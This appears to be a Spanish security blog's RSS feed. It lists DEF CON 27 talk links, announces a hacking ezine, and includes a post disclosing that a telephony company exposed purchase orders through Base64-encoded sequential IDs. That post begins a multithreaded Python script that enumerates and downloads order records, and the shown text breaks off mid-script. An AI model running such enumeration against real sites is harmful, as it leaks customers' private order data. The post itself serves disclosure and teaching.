&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Masarah-Paquet-Clouston-Olivier-Bilodeau-The-Industry-of-Social-Media-Manipulation-Driven-by-Malware.pdf"&gt;Masarah-Paquet-Clouston-Olivier-Bilodeau-The-Industry-of-Social-Media-Manipulation-Driven-by-Malware.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Masarah-Paquet-Clouston-Olivier-Bilodeau-The-Industry-of-Social-Media-Manipulation-support-video-luminati-sdk-demo.mp4"&gt;Masarah-Paquet-Clouston-Olivier-Bilodeau-The-Industry-of-Social-Media-Manipulation-support-video-luminati-sdk-demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Matt-Wixey-Sound-Effects-Exploring-Acoustic-Cyber-Weapons.pdf"&gt;Matt-Wixey-Sound-Effects-Exploring-Acoustic-Cyber-Weapons.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Michael-Leibowitz-and-Topher-Timzen-EDR-Is-Coming-Hide-Yo-Sht.pdf"&gt;Michael-Leibowitz-and-Topher-Timzen-EDR-Is-Coming-Hide-Yo-Sht.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Michael-Leibowitz-and-Topher-Timzen-EDR-Is-Coming-Hide-Yo-Sht-WINDOWS-DEMO.mp4"&gt;Michael-Leibowitz-and-Topher-Timzen-EDR-Is-Coming-Hide-Yo-Sht-WINDOWS-DEMO.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Michael-Stepankin-Apache-Solr-Injection.pdf"&gt;Michael-Stepankin-Apache-Solr-Injection.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nicolas-Oberli-Poking-the-S-in-SD-cards.PDF"&gt;Nicolas-Oberli-Poking-the-S-in-SD-cards.PDF&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nicolas-Oberli-Poking-the-S-in-SD-cards-DEMO.mkv"&gt;Nicolas-Oberli-Poking-the-S-in-SD-cards-DEMO.mkv&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nicolas-Oberli-Poking-the-S-in-SD-cards-DEMO.mp4"&gt;Nicolas-Oberli-Poking-the-S-in-SD-cards-DEMO.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nina-Kollars-Confessions-of-a-Nespresso-Money-Mule.pdf"&gt;Nina-Kollars-Confessions-of-a-Nespresso-Money-Mule.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Omer-Gull-SELECT-code-execution-FROM-USING-SQLite.pdf"&gt;Omer-Gull-SELECT-code-execution-FROM-USING-SQLite.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Omer-Gull-SELECT-code-execution-FROM-USING-SQLite-Demo.mp4"&gt;Omer-Gull-SELECT-code-execution-FROM-USING-SQLite-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Omer-Yair-Exploiting-Windows-Exploit-Mitigation-for-ROP-Exploits-Demo.mp4"&gt;Omer-Yair-Exploiting-Windows-Exploit-Mitigation-for-ROP-Exploits-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Omer-Yair-Exploiting-Windows-Exploit-Mitigation-for-ROP-Exploits.pdf"&gt;Omer-Yair-Exploiting-Windows-Exploit-Mitigation-for-ROP-Exploits.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Panel-DC101-The-Panel.pdf"&gt;Panel-DC101-The-Panel.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Patrick-Wardle-Harnessing-Weapons-of-Mac-Destruction.pdf"&gt;Patrick-Wardle-Harnessing-Weapons-of-Mac-Destruction.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Phar-No-Mas-How-One-Side-Channel-Flaw-Opens-Atm-Pharmacies-and-Government-Secrets-Up-to-Attack.pdf"&gt;Phar-No-Mas-How-One-Side-Channel-Flaw-Opens-Atm-Pharmacies-and-Government-Secrets-Up-to-Attack.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Philippe-Laulheret-Introduction-to-Hardware-Hacking-Extended-Version.pdf"&gt;Philippe-Laulheret-Introduction-to-Hardware-Hacking-Extended-Version.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Philippe-Laulheret-Introduction-to-Hardware-Hacking-Demo-Video.mp4"&gt;Philippe-Laulheret-Introduction-to-Hardware-Hacking-Demo-Video.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Roger-Dingledine-TOR-Censorship-Arms-Race.pdf"&gt;Roger-Dingledine-TOR-Censorship-Arms-Race.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Travis-Palmer-First-try-DNS-Cache-Poisoning-with-IPv4-and-IPv6-Fragmentation.pdf"&gt;Travis-Palmer-First-try-DNS-Cache-Poisoning-with-IPv4-and-IPv6-Fragmentation.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Truman-Kain-Surveillance-Detection-Scout.pdf"&gt;Truman-Kain-Surveillance-Detection-Scout.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Truman-Kain-Surveillance-Detection-Scout-Demo.mp4"&gt;Truman-Kain-Surveillance-Detection-Scout-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Wenxiang-Qian-Yuxiang-Li-Huiyu-Wu-Breaking-Google-Home-Exploit-It-with-SQLite-Magellan.pdf"&gt;Wenxiang-Qian-Yuxiang-Li-Huiyu-Wu-Breaking-Google-Home-Exploit-It-with-SQLite-Magellan.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-WillC-Phreaking-Elevators.pdf"&gt;WillC-Phreaking-Elevators.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Workshop-Anthony-Rose-Introduction-to-AMSI-Bypasses-and-Sandbox-Evasion.pdf"&gt;Workshop-Anthony-Rose-Introduction-to-AMSI-Bypasses-and-Sandbox-Evasion.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Xiaohuihui-All-The-4G-Modules-Could-Be-Hacked.pdf"&gt;Xiaohuihui-All-The-4G-Modules-Could-Be-Hacked.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Zhang-Xiangqian-Liu-Huiming-Your-secret-files-are-mine.pdf"&gt;Zhang-Xiangqian-Liu-Huiming-Your-secret-files-are-mine.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-d4krm4tter-Mike-Spicer-I-Know-What-You-Did-Last-Summer.pdf"&gt;d4krm4tter-Mike-Spicer-I-Know-What-You-Did-Last-Summer.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-d4krm4tter-Mike-Spicer-I-Know-What-You-Did-Last-Summer-Demo.mp4"&gt;d4krm4tter-Mike-Spicer-I-Know-What-You-Did-Last-Summer-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-droogie-go-null-yourself.pdf"&gt;droogie-go-null-yourself.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-grichter-Reverse-Engineering-4G-Hotspots-For-Fun-Bugs-Net-Financial-Loss.pdf"&gt;grichter-Reverse-Engineering-4G-Hotspots-For-Fun-Bugs-Net-Financial-Loss.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-grichter-Reverse-Engineering-4G-Hotspots-For-Fun-Bugs-Net-Financial-Loss-MF910-CSRF-Demo.mp4"&gt;grichter-Reverse-Engineering-4G-Hotspots-For-Fun-Bugs-Net-Financial-Loss-MF910-CSRF-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-jiska-fabian-vacuum-cleaning-security.pdf"&gt;jiska-fabian-vacuum-cleaning-security.pdf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-smea-Adventures-in-smart-buttplug-penetration-testing.pdf"&gt;smea-Adventures-in-smart-buttplug-penetration-testing.pdf&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;
Via:&amp;nbsp; &lt;a href="https://www.cyberhades.com/2019/08/17/material-def-con-27/" target="_blank"&gt;https://www.cyberhades.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2V0AKcDKDATagDbqvca8gVMVQXpxayT0F0SUZx27I3duKZzU8mjVpP3kAIpBVC9TIWsSnsHnfU7GSAVx3NTrJu368QX_qZ0Jd7AwUPVUgfX-C0GEDsVyYCy5AQBSLC1gzU4MnV2YhdRAH/s72-c/defcon27.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>UnderDOCS Ezine #1 - Agosto 2019 [Descarga PDF]</title><link>http://www.blackploit.com/2019/08/underdocs-ezine-1-agosto-2019-descarga.html</link><category>CSRF</category><category>Ezine</category><category>PDF</category><category>Python</category><category>Underc0de</category><category>UnderDOCS</category><category>XSS</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Mon, 19 Aug 2019 08:30:00 -0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-4927347355298574093</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecdgusbrGAyhuYMuPcm9G-1-DjLTvKAfK853WabouIw-D0t8ccVFGh9kt42gFanjo2WQyG_tN-5BjDq_G1lUZcbj57pPWqn8n4x22y4sZayR2q8i-JQU9Dj8ERiu92AvhF6wRCsxFx5R8/s1600/UnderDOCS_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="749" data-original-width="869" height="551" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecdgusbrGAyhuYMuPcm9G-1-DjLTvKAfK853WabouIw-D0t8ccVFGh9kt42gFanjo2WQyG_tN-5BjDq_G1lUZcbj57pPWqn8n4x22y4sZayR2q8i-JQU9Dj8ERiu92AvhF6wRCsxFx5R8/s640/UnderDOCS_1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
La comunidad de &lt;b&gt;Underc0de&lt;/b&gt; ha publicado la primera versión de su revista digital en la cual podemos encontrar artículos de &lt;b&gt;hacking&lt;/b&gt;, &lt;b&gt;ciberseguridad&lt;/b&gt;, &lt;b&gt;pentest&lt;/b&gt; y &lt;b&gt;programación&lt;/b&gt;, entre otros.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Sin duda es una gran iniciativa y se agradece que el conocimiento de la comunidad se formalice en una revista que está bien editada y es fácil de leer.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Los contenidos que se tocan son los siguientes:&lt;/div&gt;
&lt;ul style="text-align: justify;"&gt;
&lt;li&gt;Inteligencia Artifical: Redes Sociales Y Realidad&lt;/li&gt;
&lt;li&gt;Bypass CSRF Mediante XSS&lt;/li&gt;
&lt;li&gt;Bypass SPF&lt;/li&gt;
&lt;li&gt;Generación De Un Exploit&lt;/li&gt;
&lt;li&gt;Pytorch - Redes Neuronales En Python De Forma Fácil&lt;/li&gt;
&lt;li&gt;Introducción Al Interprete De Comandos Linux&lt;/li&gt;
&lt;li&gt;¿Cómo Iniciarse En La Programación?&lt;/li&gt;
&lt;li&gt;Jupyter Notebook Para Principiantes&lt;/li&gt;
&lt;li&gt;Nodejs En Pequeñas Dosis&lt;/li&gt;
&lt;li&gt;Python For Kids Para Los Más Y No Tan Pequeños&lt;/li&gt;
&lt;li&gt;Web Scraping Con Python Y Beatifulsoap&lt;/li&gt;
&lt;li&gt;Revirtiendo Cualquier Controlador&lt;/li&gt;
&lt;li&gt;Disquete: Icono Universal De Guardado&lt;/li&gt;
&lt;li&gt;OFF TOPIC&lt;/li&gt;
&lt;li&gt;Undertools DIY&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Los dejo a continuación con &lt;b&gt;UnderDOCS Ezine #1&lt;/b&gt;:&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;iframe height="480" src="https://drive.google.com/file/d/1wSzJRAtQVTsFF24P7JmodPU5lCbWF-L6/preview" width="640"&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;a href="https://drive.google.com/file/d/1wSzJRAtQVTsFF24P7JmodPU5lCbWF-L6/view" target="_blank"&gt;&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Descargar UnderDOCS Ezine #1&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecdgusbrGAyhuYMuPcm9G-1-DjLTvKAfK853WabouIw-D0t8ccVFGh9kt42gFanjo2WQyG_tN-5BjDq_G1lUZcbj57pPWqn8n4x22y4sZayR2q8i-JQU9Dj8ERiu92AvhF6wRCsxFx5R8/s72-c/UnderDOCS_1.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hackeando Todas Las Órdenes De Compra De Una Empresa De Telefonía / Base64 NO es un método de encriptación</title><link>http://www.blackploit.com/2019/06/hackeando-todas-las-ordenes-de-compra.html</link><category>Base64</category><category>Fuga de Datos</category><category>Hacked</category><category>Hacking</category><category>Ingeniería Social</category><category>Noticias</category><category>Privacidad</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Fri, 28 Jun 2019 17:36:00 -0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-2421942077948634623</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDqGBiqWr6rAzTefjHCKOYcPnXAuKGE3wqBasLfh43WqCZQSCOsYFLwu9LBemlnzMco7yQO37rBBAKPGosHJi1g1bly86-r4jrW4omLtYxbP3A_h9BClXqNXzmFL2dbhQWM1pMUH7YXh_1/s1600/base64.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="422" data-original-width="750" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDqGBiqWr6rAzTefjHCKOYcPnXAuKGE3wqBasLfh43WqCZQSCOsYFLwu9LBemlnzMco7yQO37rBBAKPGosHJi1g1bly86-r4jrW4omLtYxbP3A_h9BClXqNXzmFL2dbhQWM1pMUH7YXh_1/s640/base64.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Base64 es un sistema de numeración posicional que usa 64 como base. Es la mayor potencia de dos que puede ser representada usando únicamente los caracteres imprimibles de ASCII [&lt;a href="https://es.wikipedia.org/wiki/Base64" target="_blank"&gt;1&lt;/a&gt;].&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Todos los sistemas de numeración tienen una lista de símbolos que utilizan para representar valores, por ejemplo [&lt;a href="https://varionet.wordpress.com/2009/11/06/sobre-base64-para-que-usarlo-para-que-no-y-como-manejarlo-en-net-y-asp-net/" target="_blank"&gt;2&lt;/a&gt;]:&lt;/div&gt;
&lt;br /&gt;
Binario: &lt;b&gt;01&lt;/b&gt;&lt;br /&gt;
Decimal: &lt;b&gt;0123456789&lt;/b&gt;&lt;br /&gt;
Hexadecimal: &lt;b&gt;0123456789ABCDEF&lt;/b&gt;&lt;br /&gt;
y para &lt;b&gt;Base64&lt;/b&gt; el conjunto es: &lt;br /&gt;
&lt;pre&gt;&lt;code&gt;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
La función para codificar en Base64 es biyectiva, lo que significa que existe una función que dado un texto encriptado en Base64, esta obtiene el texto original.&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;base64encode('blackploit') = 'YmxhY2twbG9pdA=='
base64decode('YmxhY2twbG9pdA==') = 'blackploit'&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Base64 no es un método de encriptación. Si bien ofusca la 
información ante la vista normal, se puede obtener la información original muy fácilmente.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Base64 &lt;i&gt;pesa&lt;/i&gt; un 33% más que la información original. Esta relación 
está dada por la relación 8 a 6 bits por carácter, (o sea, un carácter 
de base64 representa menos información que un carácter normal).&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Base64 es muy útil, y sus tres principales usos son:&lt;/div&gt;
&lt;ul&gt;
&lt;li style="text-align: justify;"&gt;Transmitir datos en codificaciones conocidas como ASCII o utf-8, sin tener problemas de compatibilidad entre sistemas, lo que permite transmitir binarios también.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Permite pasar a través de URLs caracteres raros o comodines como &lt;b&gt;#/^?&lt;/b&gt; sin ser procesados por el navegador.&lt;/li&gt;
&lt;li style="text-align: justify;"&gt;Puedes visualizar imágenes en Base64, por lo cual puedes guardar tus imágenes como texto en una base de datos y no como archivos en un sistema de ficheros.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
Este emoji está en Base64: &lt;img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABt0lEQVQ4jZWTsWtTURTGf+e+mzYpCAZJIBE0piQUS7EgBbN06FDM8ob+CWKMW0fxT3CMiwaDf0GnLt2KdHlTQQeFVmxTRB2C0UESY17uc3g39eWFCPngDvee7zv3u+fcI8TQ36+sA3VgCyjY4zZwCDRTrvc2ypeIcAloAA8AFU9sYYDXwG7K9XqXCaz4ANicIYzjCKimXK83vqkxhxjLbQCIffPxf2zPggHuaqD+7sIo76Phyw/oDQKSC1DICMVMWKKzTkC7E/D7DywtCtfTUCkpdeemqkt3795J9dmw7Jv5rtcKDp4kTlUyQSGXniYogVZN06pplEzHc2lIJigoEWF7zZkiFLPCSl6xklcUs9MZttccRAQNtHc2VLn7K8AfwWIiXFu3/9X0qetw+MEwGMJgCNqBnQ0F0Jb+fuUF8HhM/tTR3Lrmo2I9MQbOv2uWM370+KUGmsAjbBv9ETx/c4XV3JAbaR8EPncd3n9b4P5qfyIn0Bz/xFfAw8tIEDr5+jOsTf7qiOWMHy9mK+V6NW03u0AZ+xuVQCnrU8pO2I3iyGpC23YwqkDLWpsFYznViWGKYt5x/gvnj4PS5kTD9gAAAABJRU5ErkJggg==" /&gt;&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABt0lEQVQ4jZWTsWtTURTGf+e+mzYpCAZJIBE0piQUS7EgBbN06FDM8ob+CWKMW0fxT3CMiwaDf0GnLt2KdHlTQQeFVmxTRB2C0UESY17uc3g39eWFCPngDvee7zv3u+fcI8TQ36+sA3VgCyjY4zZwCDRTrvc2ypeIcAloAA8AFU9sYYDXwG7K9XqXCaz4ANicIYzjCKimXK83vqkxhxjLbQCIffPxf2zPggHuaqD+7sIo76Phyw/oDQKSC1DICMVMWKKzTkC7E/D7DywtCtfTUCkpdeemqkt3795J9dmw7Jv5rtcKDp4kTlUyQSGXniYogVZN06pplEzHc2lIJigoEWF7zZkiFLPCSl6xklcUs9MZttccRAQNtHc2VLn7K8AfwWIiXFu3/9X0qetw+MEwGMJgCNqBnQ0F0Jb+fuUF8HhM/tTR3Lrmo2I9MQbOv2uWM370+KUGmsAjbBv9ETx/c4XV3JAbaR8EPncd3n9b4P5qfyIn0Bz/xFfAw8tIEDr5+jOsTf7qiOWMHy9mK+V6NW03u0AZ+xuVQCnrU8pO2I3iyGpC23YwqkDLWpsFYznViWGKYt5x/gvnj4PS5kTD9gAAAABJRU5ErkJggg=="&amp;gt;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Esta larga introducción es para mostrarles que &lt;b&gt;Base64 NO es un método de encriptación&lt;/b&gt;. Comprando un producto a través de una página de telefonía, me encontré con que usaban como método de "seguridad" pasar el &lt;i&gt;id&lt;/i&gt; de una orden de compra &lt;strike&gt;encriptada&lt;/strike&gt; codificada a Base64, lo cual permitió una fuga generalizada de las órdenes de compra de esa empresa.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Aquí los dejo con el análisis de las vulnerabilidades:&lt;/div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style="font-size: x-large;"&gt;&lt;b&gt;Vulnerabilidades&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span style="font-size: medium;"&gt;&lt;b&gt;Vulnerabilidad 1 - Obtención de todas las órdenes de compra&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Una vez que se compra un producto en "empresa telefonía", se envía la orden de compra con un enlace con el siguiente formato:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;https://empresatelefonia.cl/fullprice/certificadopdforden?id=NDAwMDAxOTgyNQ==&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Como podemos notar el parámetro &lt;i&gt;&lt;b&gt;id&lt;/b&gt;&lt;/i&gt; recibe algo en &lt;i&gt;Base64&lt;/i&gt;, si lo decodificamos nos damos cuenta que es exactamente el &lt;i&gt;&lt;b&gt;id&lt;/b&gt;&lt;/i&gt; de la compra:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;NDAwMDAxOTgyNQ== → &lt;span style="color: #cc0000;"&gt;4000019825&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
También podemos notar que la orden de compra es un número ascendente, que probablemente parte del 4000000000.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para obtener todas la órdenes se crea un simple &lt;i&gt;script&lt;/i&gt; en &lt;i&gt;python&lt;/i&gt;
 que recorre las órdenes del 4000000000 al 4000200000 (empíricamente 
podemos notar que llegan hasta solo 4000019831 al momento de escribir 
este reporte), la orden se codifica a &lt;i&gt;Base64&lt;/i&gt; y se concatena con la &lt;i&gt;URL&lt;/i&gt; que genera la orden de compra:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;pre&gt;&lt;code&gt;import threading
import time
import requests
import base64
import sys
import os

START_IN = 4000000000
STOP_IN = 4000020000
THREADS = 5
SAVE_PATH = './orders'

class ThreadFunction(threading.Thread):
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;def run(self):
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;global START_IN
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;while True:
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;START_IN +=1
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if START_IN &amp;gt; STOP_IN:
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;order_number = str(START_IN)
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;b64_order_number = base64.b64encode(order_number.encode('ascii')).decode("utf-8")
